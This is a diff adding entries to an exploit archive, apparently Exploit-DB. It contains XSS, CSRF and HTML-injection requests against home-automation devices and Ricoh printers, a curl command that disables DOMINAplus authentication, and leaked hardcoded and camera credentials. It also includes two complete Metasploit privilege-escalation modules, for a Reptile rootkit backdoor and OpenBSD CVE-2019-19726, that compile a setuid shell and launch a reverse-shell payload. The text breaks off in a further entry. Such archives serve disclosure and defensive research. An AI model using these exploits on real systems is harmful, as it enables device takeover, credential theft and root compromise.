||||
PHP/5.4.41-0+deb7u1
|
||||
PHP/5.4.36-0+deb7u3
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2019-5547
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5547.php
|
||||
|
||||
|
||||
06.10.2019
|
||||
|
||||
--
|
||||
|
||||
|
||||
Reflected XSS in User and Password POST parameters in login.php:
|
||||
--
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://192.168.1.10/login.php" method="POST">
|
||||
<input type="hidden" name="cmd" value="doLogin" />
|
||||
<input type="hidden" name="User" value=""><marquee>SLIDERS</marquee>" />
|
||||
<input type="hidden" name="Password" value=""><script>confirm(251)</script>" />
|
||||
<input type="hidden" name="btnLogin" value="Login" />
|
||||
<input type="submit" value="Send" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Example CSRF schedule temperature for day, afternoon, night: 19.0, 18.0, 15.0
|
||||
--
|
||||
GET /bridge.php?command=STC¶meter=25,1,1&dati=190,180,150,1454025386,85,-1433059328, HTTP/1.1
|
||||
|
||||
|
||||
Example CSRF enable/disable alarm:
|
||||
--
|
||||
GET /antitheft.php?command=Attiva&codice=32&rnd=0.8815229032260505 HTTP/1.1
|
88
exploits/hardware/webapps/47822.txt
Normal file
88
exploits/hardware/webapps/47822.txt
Normal file
|
@ -0,0 +1,88 @@
|
|||
# Exploit: AVE DOMINAplus 1.10.x - Authentication Bypass
|
||||
# Date: 2019-12-30
|
||||
# Author: LiquidWorm
|
||||
# Vendor: AVE S.p.A.
|
||||
# Product web page: https://www.ave.it | https://www.domoticaplus.it
|
||||
# Affected version: Web Server Code 53AB-WBS - 1.10.62
|
||||
# Advisory ID: ZSL-2019-5549
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5549.php
|
||||
|
||||
AVE DOMINAplus <=1.10.x Authentication Bypass Exploit
|
||||
|
||||
|
||||
Vendor: AVE S.p.A.
|
||||
Product web page: https://www.ave.it | https://www.domoticaplus.it
|
||||
Affected version: Web Server Code 53AB-WBS - 1.10.62
|
||||
Touch Screen Code TS01 - 1.0.65
|
||||
Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
|
||||
Touch Screen Code TS05 - 1.10.36
|
||||
Models: 53AB-WBS
|
||||
TS01
|
||||
TS03V
|
||||
TS04X-V
|
||||
TS05N-V
|
||||
App version: 1.10.77
|
||||
App version: 1.10.65
|
||||
App version: 1.10.64
|
||||
App version: 1.10.62
|
||||
App version: 1.10.60
|
||||
App version: 1.10.52
|
||||
App version: 1.10.52A
|
||||
App version: 1.10.49
|
||||
App version: 1.10.46
|
||||
App version: 1.10.45
|
||||
App version: 1.10.44
|
||||
App version: 1.10.35
|
||||
App version: 1.10.25
|
||||
App version: 1.10.22
|
||||
App version: 1.10.11
|
||||
App version: 1.8.4
|
||||
App version: TS1-1.0.65
|
||||
App version: TS1-1.0.62
|
||||
App version: TS1-1.0.44
|
||||
App version: TS1-1.0.10
|
||||
App version: TS1-1.0.9
|
||||
|
||||
Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
|
||||
Designed to revolutionize your concept of living. DOMINA plus is the AVE home
|
||||
automation proposal that makes houses safer, more welcoming and optimized. In
|
||||
fact, our home automation system introduces cutting-edge technologies, designed
|
||||
to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
|
||||
and security and offers advanced supervision tools in order to learn how to
|
||||
evaluate and reduce consumption through various solutions dedicated to energy
|
||||
saving.
|
||||
|
||||
Desc: DOMINAplus suffers from an authentication bypass vulnerability due to missing
|
||||
control check when directly calling the autologin GET parameter in changeparams.php
|
||||
script. Setting the autologin value to 1 allows an unauthenticated attacker to
|
||||
permanently disable the authentication security control and access the management
|
||||
interface with admin privileges without providing credentials.
|
||||
|
||||
Tested on: GNU/Linux 4.1.19-armv7-x7
|
||||
GNU/Linux 3.8.13-bone50/bone71.1/bone86
|
||||
Apache/2.4.7 (Ubuntu)
|
||||
Apache/2.2.22 (Debian)
|
||||
PHP/5.5.9-1ubuntu4.23
|
||||
PHP/5.4.41-0+deb7u1
|
||||
PHP/5.4.36-0+deb7u3
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2019-5549
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5549.php
|
||||
|
||||
|
||||
06.10.2019
|
||||
|
||||
--
|
||||
|
||||
|
||||
#
|
||||
# Mina... Mina, open your eyes!
|
||||
#
|
||||
|
||||
$ curl -s http://192.168.1.10/changeparams.php?operazione=3&autologin=1
|
||||
1
|
34
exploits/hardware/webapps/47823.txt
Normal file
34
exploits/hardware/webapps/47823.txt
Normal file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: Heatmiser Netmonitor 3.03 - Hardcoded Credentials
|
||||
# Date: 2019-12-22
|
||||
# Exploit Author: Ismail Tasdelen
|
||||
# Vendor Homepage: https://www.heatmiser.com/en/
|
||||
# Hardware Link: https://www.zoneregeling.nl/heatmiser/netmonitor-handleiding.pdf
|
||||
# Software: Netmonitor v3.03
|
||||
# Product Version: Netmonitor v3.03
|
||||
# CWE : CWE-798
|
||||
# Vulenrability: Use of Hard-coded Credentials
|
||||
# CVE: N/A
|
||||
|
||||
# Decription :
|
||||
# Hard-coded Credentials security vulnerability of Netmonitor model v3.03
|
||||
# from Heatmiser manufacturer has been discovered. With this
|
||||
# vulnerability, the hidFrm form in the source code of the page
|
||||
# anonymously has access to hidden input codes. This information is
|
||||
# contained in the input field of the hidFrm form in the source code
|
||||
# lognm and logpd.
|
||||
|
||||
|
||||
HTTP GET Request : /networkSetup.htm HTTP/1.1
|
||||
|
||||
<form name="hidFrm" method="post">
|
||||
<input type="hidden" name="lognm" value="admin">
|
||||
<input type="hidden" name="logpd" value="admin">
|
||||
<input type="hidden" name="ip" value="XXX.XXX.XXX.XXX">
|
||||
<input type="hidden" name="mask" value="XXX.XXX.XXX.XXX">
|
||||
<input type="hidden" name="gate" value="XXX.XXX.XXX.XXX">
|
||||
<input type="hidden" name="dns" value="XXX.XXX.XXX.XXX">
|
||||
<input type="hidden" name="timestr" value="04:27">
|
||||
<input type="hidden" name="datestr" value="23/12/2019">
|
||||
<input type="hidden" name="timeflag" ,="" value="0">
|
||||
<input type="hidden" name="gmtflag" ,="" value="1">
|
||||
</form>
|
72
exploits/hardware/webapps/47824.txt
Normal file
72
exploits/hardware/webapps/47824.txt
Normal file
|
@ -0,0 +1,72 @@
|
|||
# Exploit: MyDomoAtHome REST API Domoticz ISS Gateway 0.2.40 - Information Disclosure
|
||||
# Date: 2019-12-30
|
||||
# Author: LiquidWorm
|
||||
# Vendor: Emmanuel
|
||||
# Product web page: https://github.com/empierre/MyDomoAtHome
|
||||
# https://www.domoticz.com/wiki/ImperiHome
|
||||
# https://docs.imperihome.com/app/iss
|
||||
# Affected version: 0.2.40
|
||||
# Advisory ID: ZSL-2019-5555
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5555.php
|
||||
|
||||
MyDomoAtHome (MDAH) REST API Domoticz ISS Gateway 0.2.40 Information Disclosure
|
||||
|
||||
|
||||
Vendor: Emmanuel
|
||||
Product web page: https://github.com/empierre/MyDomoAtHome
|
||||
https://www.domoticz.com/wiki/ImperiHome
|
||||
https://docs.imperihome.com/app/iss
|
||||
Affected version: 0.2.40
|
||||
|
||||
Summary: REST Gateway between Domoticz and Imperihome ISS. Domoticz is a home automation
|
||||
system with a pretty wide library of supported devices, ranging from weather stations to
|
||||
smoke detectors to remote controls, and a large number of additional third-party integrations
|
||||
are documented on the project's website. It is designed with an HTML5 frontend, making it
|
||||
accessible from desktop browsers and most modern smartphones, and is lightweight, running
|
||||
on many low-power devices like the Raspberry Pi.
|
||||
|
||||
Desc: MyDomoAtHome REST API is affected by an information disclosure vulnerability due to
|
||||
improper access control enforcement. An unauthenticated remote attacker can exploit this,
|
||||
via a specially crafted request to gain access to sensitive information.
|
||||
|
||||
Tested on: NodeJS: 10.15.0, 8.15.1, 8.15.0, 8.11.1, 8.9.4, 4.8.7, 4.2.2
|
||||
Webmanager/Engine: EJS
|
||||
Renderer: Express
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2019-5555
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5555.php
|
||||
|
||||
|
||||
07.11.2019
|
||||
|
||||
--
|
||||
|
||||
|
||||
--snip--
|
||||
Device Type string: DevCamera
|
||||
Param Key Description
|
||||
----------------------------
|
||||
localjpegurl Local URL to the JPEG snapshot of the camera (Note : login/pass can be passed like this http://login:pass@url)
|
||||
localmjpegurl Local URL to the camera's MJPEG stream
|
||||
remotejpegurl Remote URL to the JPEG snapshot of the camera
|
||||
remotemjpegurl Remote URL to the camera's MJPEG stream
|
||||
--snip--
|
||||
|
||||
|
||||
PoC #1:
|
||||
-------
|
||||
|
||||
root@kali:~/domoticz# curl -s http://192.168.0.100:3001/devices |tail -c $((100+850))
|
||||
[{"value":"http://admin:s3cr3t0P4ssw0rduz@192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"localjpegurl"},{"value":"http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"remotejpegurl"}],"name":"Extérieur","type":"DevCamera","id":"2_cam","room":"Switches"},{"params":[{"value":"http://admin2:An0th3rs3cr3tp4ss@192.168.0.15:8084/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin2&pwd=An0th3rs3cr3tp4ss","key":"localjpegurl"},{"value":"http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"remotejpegurl"}],"name":"cuisine","type":"DevCamera","id":"3_cam","room":"Switches"},{"params":[{"value":"http://127.0.0.1:8080/uvccapture.cgi","key":"localjpegurl"},{"value":"http://192.168.0.50:8083/cgi-bin/CGIProxy.fcgi?cmd=snapPicture2&usr=admin&pwd=s3cr3t0P4ssw0rduz","key":"remotejpegurl"}],"name":"uvccam","type":"DevCamera","id":"4_cam","room":"Switches"}]}
|
||||
|
||||
|
||||
PoC #2:
|
||||
-------
|
||||
|
||||
root@kali:~/domoticz# curl -s http://192.168.1.100:3001/devices |tail -c $((200-22))
|
||||
{"id":"C0","name":"Portail","type":"DevCamera","room":"Switches","params":[{"key":"localjpegurl","value":"http://admin:y3T4n0ther1&&@http://192.168.1.210/doc/page/preview.asp"}]}]}
|
47
exploits/hardware/webapps/47826.txt
Normal file
47
exploits/hardware/webapps/47826.txt
Normal file
|
@ -0,0 +1,47 @@
|
|||
# Exploit Title: RICOH SP 4510SF Printer - HTML Injection
|
||||
# Date: 2019-05-06
|
||||
# Exploit Author: Ismail Tasdelen
|
||||
# Vendor Homepage: https://www.ricoh.com/
|
||||
# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/re1/model/sp4510/sp4510.htm
|
||||
# Software: RICOH Printer
|
||||
# Product Version: SP 4510SF
|
||||
# Vulernability Type: Code Injection
|
||||
# Vulenrability: HTML Injection
|
||||
# CVE: N/A
|
||||
|
||||
# Description :
|
||||
# An HTML Injection vulnerability has been discovered on the RICOH SP 4510SF
|
||||
# via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter.
|
||||
|
||||
|
||||
# HTTP POST Request :
|
||||
|
||||
POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
|
||||
Host: XXX.XXX.XXX.XXX
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
|
||||
Accept: text/plain, */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 218
|
||||
Origin: http://XXX.XXX.XX.XXX
|
||||
Connection: close
|
||||
Referer: http://189.72.192.16/web/entry/en/address/adrsList.cgi
|
||||
Cookie: risessionid=058916016024825; cookieOnOffChecker=on; wimsesid=314062051
|
||||
|
||||
mode=ADDUSER&step=BASE&wimToken=1273767750&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3Eismailtasdelen&entryDisplayNameIn=%22%3E%3Ch1%3Eismailtasdelen&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
|
||||
|
||||
# HTTP Response :
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Fri, 20 Dec 2019 07:59:19 GMT
|
||||
Server: Web-Server/3.0
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
Expires: Fri, 20 Dec 2019 07:59:19 GMT
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache
|
||||
Set-Cookie: cookieOnOffChecker=on; path=/
|
||||
Connection: close
|
||||
|
||||
[14]
|
21
exploits/hardware/webapps/47827.txt
Normal file
21
exploits/hardware/webapps/47827.txt
Normal file
|
@ -0,0 +1,21 @@
|
|||
# Exploit Title: RICOH Web Image Monitor 1.09 - HTML Injection
|
||||
# Date: 2019-05-06
|
||||
# Exploit Author: Ismail Tasdelen
|
||||
# Vendor Homepage: https://www.ricoh.com/
|
||||
# Hardware Link: http://support-download.com/services/device/webhlp/nb/gen/v140cc1/en/p_top010.html
|
||||
# Software: RICOH Web Image Monitor
|
||||
# Product Version: v1.09
|
||||
# Vulernability Type: Code Injection
|
||||
# Vulenrability: HTML Injection
|
||||
# CVE: N/A
|
||||
|
||||
# Descripton :
|
||||
# It has been discovered that in the v1.09 version of Image Monitor from
|
||||
# RICOH, HTML Injection can be run on the /web/entry/en/address/adrsSetUserWizard.cgi
|
||||
# function. This vulnerability affected all hardware that uses the entire
|
||||
# Image Monitor v1.09.
|
||||
|
||||
# Attack Vectors :
|
||||
|
||||
You can run HTML Injection on the entryNameIn and entryDisplayNameIn in the corresponding function.
|
||||
HTML Injection Payload : "><h1>ismailtasdelen
|
43
exploits/hardware/webapps/47828.txt
Normal file
43
exploits/hardware/webapps/47828.txt
Normal file
|
@ -0,0 +1,43 @@
|
|||
# Exploit Title: Heatmiser Netmonitor 3.03 - HTML Injection
|
||||
# Date: 2019-12-22
|
||||
# Exploit Author: Ismail Tasdelen
|
||||
# Vendor Homepage: https://www.heatmiser.com/en/
|
||||
# Hardware Link: https://www.zoneregeling.nl/heatmiser/netmonitor-handleiding.pdf
|
||||
# Software: Netmonitor v3.03
|
||||
# Product Version: Netmonitor v3.03
|
||||
# Vulernability Type: Code Injection
|
||||
# Vulenrability: HTML Injection
|
||||
# CVE: N/A
|
||||
|
||||
# Description :
|
||||
# Heatmiser Net Monitor v3.03 allows HTML Injection via the
|
||||
# outputSetup.htm outputtitle parameter. The HTML Injection
|
||||
# vulnerability was discovered in v3.03 version of Net Monitor
|
||||
# from the Heatmiser manufacturer. This vulnerability is
|
||||
# vulnerable to hardware that use this software.
|
||||
|
||||
|
||||
# HTTP Post Request :
|
||||
|
||||
POST /outputSetup.htm HTTP/1.1
|
||||
Host: XXX.XXX.XXX.XXX
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 95
|
||||
Origin: http://XXX.XXX.XXX.XXX
|
||||
Connection: close
|
||||
Referer: http://TARGET/outputSetup.htm
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
outputtitle=%22%3E%3Cmarquee%3ETEST%23undefined%23undefined%23undefined%23undefined%23undefined
|
||||
|
||||
# HTTP Response :
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 22 Dec 2019 20:25:22 GMT
|
||||
Server: Z-World Rabbit
|
||||
Connection: close
|
||||
Content-Type: text/html
|
126
exploits/linux/local/47804.rb
Executable file
126
exploits/linux/local/47804.rb
Executable file
|
@ -0,0 +1,126 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Linux::Priv
|
||||
include Msf::Post::Linux::System
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',
|
||||
'Description' => %q{
|
||||
This module uses Reptile rootkit's `reptile_cmd` backdoor executable
|
||||
to gain root privileges using the `root` command.
|
||||
|
||||
This module has been tested successfully with Reptile from `master`
|
||||
branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'f0rb1dd3n', # Reptile
|
||||
'bcoles' # Metasploit
|
||||
],
|
||||
'DisclosureDate' => '2018-10-29', # Reptile first stable release
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://github.com/f0rb1dd3n/Reptile'],
|
||||
['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']
|
||||
],
|
||||
'Platform' => ['linux'],
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'SessionTypes' => ['shell', 'meterpreter'],
|
||||
'Targets' => [['Auto', {}]],
|
||||
'Notes' =>
|
||||
{
|
||||
'Reliability' => [ REPEATABLE_SESSION ],
|
||||
'Stability' => [ CRASH_SAFE ]
|
||||
},
|
||||
'DefaultTarget' => 0))
|
||||
register_options [
|
||||
OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])
|
||||
]
|
||||
register_advanced_options [
|
||||
OptBool.new('ForceExploit', [false, 'Override check result', false]),
|
||||
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
|
||||
]
|
||||
end
|
||||
|
||||
def reptile_cmd_path
|
||||
datastore['REPTILE_CMD_PATH']
|
||||
end
|
||||
|
||||
def base_dir
|
||||
datastore['WritableDir'].to_s
|
||||
end
|
||||
|
||||
def upload(path, data)
|
||||
print_status "Writing '#{path}' (#{data.size} bytes) ..."
|
||||
rm_f path
|
||||
write_file path, data
|
||||
register_file_for_cleanup path
|
||||
end
|
||||
|
||||
def upload_and_chmodx(path, data)
|
||||
upload path, data
|
||||
chmod path
|
||||
end
|
||||
|
||||
def check
|
||||
unless executable? reptile_cmd_path
|
||||
vprint_error "#{reptile_cmd_path} is not executable"
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good "#{reptile_cmd_path} is executable"
|
||||
|
||||
res = cmd_exec("echo id|#{reptile_cmd_path} root").to_s.strip
|
||||
vprint_status "Output: #{res}"
|
||||
|
||||
if res.include?('You have no power here!')
|
||||
vprint_error 'Reptile kernel module is not loaded'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
unless res.include?('root')
|
||||
vprint_error 'Reptile is not installed'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good 'Reptile is installed and loaded'
|
||||
|
||||
CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless check == CheckCode::Vulnerable
|
||||
unless datastore['ForceExploit']
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
|
||||
end
|
||||
print_warning 'Target does not appear to be vulnerable'
|
||||
end
|
||||
|
||||
if is_root?
|
||||
unless datastore['ForceExploit']
|
||||
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
|
||||
end
|
||||
end
|
||||
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
payload_name = ".#{rand_text_alphanumeric 8..12}"
|
||||
payload_path = "#{base_dir}/#{payload_name}"
|
||||
upload_and_chmodx payload_path, generate_payload_exe
|
||||
|
||||
print_status 'Executing payload...'
|
||||
res = cmd_exec "echo '#{payload_path}&' | #{reptile_cmd_path} root & echo "
|
||||
vprint_line res
|
||||
end
|
||||
end
|
213
exploits/openbsd/local/47803.rb
Executable file
213
exploits/openbsd/local/47803.rb
Executable file
|
@ -0,0 +1,213 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'OpenBSD Dynamic Loader chpass Privilege Escalation',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the OpenBSD `ld.so`
|
||||
dynamic loader (CVE-2019-19726).
|
||||
|
||||
The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`
|
||||
environment variable when set with approximately `ARG_MAX` colons.
|
||||
|
||||
This can be abused to load `libutil.so` from an untrusted path,
|
||||
using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid
|
||||
executable, resulting in privileged code execution.
|
||||
|
||||
This module has been tested successfully on:
|
||||
|
||||
OpenBSD 6.1 (amd64); and
|
||||
OpenBSD 6.6 (amd64)
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Qualys', # Discovery and exploit
|
||||
'bcoles' # Metasploit
|
||||
],
|
||||
'DisclosureDate' => '2019-12-11',
|
||||
'Platform' => %w[bsd unix], # OpenBSD
|
||||
'Arch' => [ARCH_CMD],
|
||||
'SessionTypes' => ['shell'],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2019-19726'],
|
||||
['EDB', '47780'],
|
||||
['URL', 'https://blog.qualys.com/laws-of-vulnerabilities/2019/12/11/openbsd-local-privilege-escalation-vulnerability-cve-2019-19726'],
|
||||
['URL', 'https://www.qualys.com/2019/12/11/cve-2019-19726/local-privilege-escalation-openbsd-dynamic-loader.txt'],
|
||||
['URL', 'https://www.openwall.com/lists/oss-security/2019/12/11/9'],
|
||||
['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19726/openbsd-dynamic-loader-chpass'],
|
||||
['URL', 'https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/013_ldso.patch.sig']
|
||||
],
|
||||
'Targets' => [['Automatic', {}]],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'PAYLOAD' => 'cmd/unix/reverse',
|
||||
'WfsDelay' => 10
|
||||
},
|
||||
'DefaultTarget' => 0))
|
||||
register_options [
|
||||
OptString.new('CHPASS_PATH', [true, 'Path to chpass', '/usr/bin/chpass'])
|
||||
]
|
||||
register_advanced_options [
|
||||
OptBool.new('ForceExploit', [false, 'Override check result', false]),
|
||||
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
|
||||
]
|
||||
end
|
||||
|
||||
def base_dir
|
||||
datastore['WritableDir'].to_s
|
||||
end
|
||||
|
||||
def chpass_path
|
||||
datastore['CHPASS_PATH']
|
||||
end
|
||||
|
||||
def upload(path, data)
|
||||
print_status "Writing '#{path}' (#{data.size} bytes) ..."
|
||||
rm_f path
|
||||
write_file path, data
|
||||
register_file_for_cleanup path
|
||||
end
|
||||
|
||||
def is_root?
|
||||
(cmd_exec('id -u').to_s.gsub(/[^\d]/, '') == '0')
|
||||
end
|
||||
|
||||
def libutil_name
|
||||
return unless command_exists? 'readelf'
|
||||
cmd_exec('readelf -a /usr/sbin/pwd_mkdb').to_s.scan(/\[(libutil\.so\.[\d\.]+)\]/).flatten.first
|
||||
end
|
||||
|
||||
def check
|
||||
patches = cmd_exec('syspatch -l').to_s
|
||||
patch = '013_ldso'
|
||||
if patches.include? patch
|
||||
vprint_error "Patch #{patch} has been installed. Target is not vulnerable."
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good "Patch #{patch} is not present"
|
||||
|
||||
unless command_exists? 'cc'
|
||||
vprint_error 'cc is not installed'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
print_good 'cc is installed'
|
||||
|
||||
CheckCode::Detected
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless check == CheckCode::Detected
|
||||
unless datastore['ForceExploit']
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
|
||||
end
|
||||
print_warning 'Target does not appear to be vulnerable'
|
||||
end
|
||||
|
||||
if is_root?
|
||||
unless datastore['ForceExploit']
|
||||
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
|
||||
end
|
||||
end
|
||||
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
# Qualys set-uid shared object from https://www.openwall.com/lists/oss-security/2019/12/11/9
|
||||
lib_data = <<-EOF
|
||||
#include <paths.h>
|
||||
#include <unistd.h>
|
||||
|
||||
static void __attribute__ ((constructor)) _init (void) {
|
||||
if (setuid(0) != 0) _exit(__LINE__);
|
||||
if (setgid(0) != 0) _exit(__LINE__);
|
||||
char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL };
|
||||
execve(argv[0], argv, NULL);
|
||||
_exit(__LINE__);
|
||||
}
|
||||
EOF
|
||||
|
||||
libs = []
|
||||
lib = libutil_name
|
||||
if lib
|
||||
libs << lib
|
||||
print_good "Found libutil.so name: #{lib}"
|
||||
else
|
||||
libs << 'libutil.so.12.1'
|
||||
libs << 'libutil.so.13.1'
|
||||
print_warning "Could not determine libutil.so name. Using: #{libs.join(', ')}"
|
||||
end
|
||||
|
||||
lib_src_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}.c"
|
||||
upload lib_src_path, lib_data
|
||||
libs.each do |lib_name|
|
||||
lib_path = "#{base_dir}/#{lib_name}"
|
||||
print_status "Compiling #{lib_path} ..."
|
||||
output = cmd_exec "cc -fpic -shared -s -o #{lib_path} #{lib_src_path} -Wall"
|
||||
register_file_for_cleanup lib_path
|
||||
|
||||
unless output.blank?
|
||||
print_error output
|
||||
fail_with Failure::Unknown, "#{lib_path}.c failed to compile"
|
||||
end
|
||||
end
|
||||
|
||||
# Qualys exploit from https://www.openwall.com/lists/oss-security/2019/12/11/9
|
||||
exploit_data = <<-EOF
|
||||
#include <string.h>
|
||||
#include <sys/param.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
|
||||
int
|
||||
main(int argc, char * const * argv)
|
||||
{
|
||||
#define LLP "LD_LIBRARY_PATH=."
|
||||
static char llp[ARG_MAX - 128];
|
||||
memset(llp, ':', sizeof(llp)-1);
|
||||
memcpy(llp, LLP, sizeof(LLP)-1);
|
||||
char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL };
|
||||
|
||||
#define DATA (ARG_MAX * sizeof(char *))
|
||||
const struct rlimit data = { DATA, DATA };
|
||||
if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__);
|
||||
|
||||
if (argc <= 1) _exit(__LINE__);
|
||||
argv += 1;
|
||||
execve(argv[0], argv, envp);
|
||||
_exit(__LINE__);
|
||||
}
|
||||
EOF
|
||||
|
||||
exploit_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
|
||||
upload "#{exploit_path}.c", exploit_data
|
||||
print_status "Compiling #{exploit_path} ..."
|
||||
output = cmd_exec "cc -s #{exploit_path}.c -o #{exploit_path} -Wall"
|
||||
register_file_for_cleanup exploit_path
|
||||
|
||||
unless output.blank?
|
||||
print_error output
|
||||
fail_with Failure::Unknown, "#{exploit_path}.c failed to compile"
|
||||
end
|
||||
|
||||
payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
|
||||
upload payload_path, "#!/bin/sh\n#{payload.encoded}\n"
|
||||
chmod payload_path
|
||||
|
||||
print_status 'Launching exploit...'
|
||||
output = cmd_exec("cd #{base_dir};echo '#{payload_path}&exit'|#{exploit_path} #{chpass_path}")
|
||||
output.each_line { |line| vprint_status line.chomp }
|
||||
end
|
||||
end
|
248
exploits/php/webapps/47807.txt
Normal file
248
exploits/php/webapps/47807.txt
Normal file
|
@ -0,0 +1,248 @@
|
|||
# Exploit: HomeAutomation 3.3.2 - Authentication Bypass
|
||||
# Date: 2019-12-30
|
||||
# Author: LiquidWorm
|
||||
# Vendor: Tom Rosenback and Daniel Malmgren
|
||||
# Product web page: http://karpero.mine.nu/ha/
|
||||
# Affected version: 3.3.2
|
||||
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
|
||||
# Advisory ID: ZSL-2019-5557
|
||||
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php
|
||||
|
||||
|
||||
HomeAutomation v3.3.2 Authentication Bypass Exploit
|
||||
|
||||
|
||||
Vendor: Tom Rosenback and Daniel Malmgren
|
||||
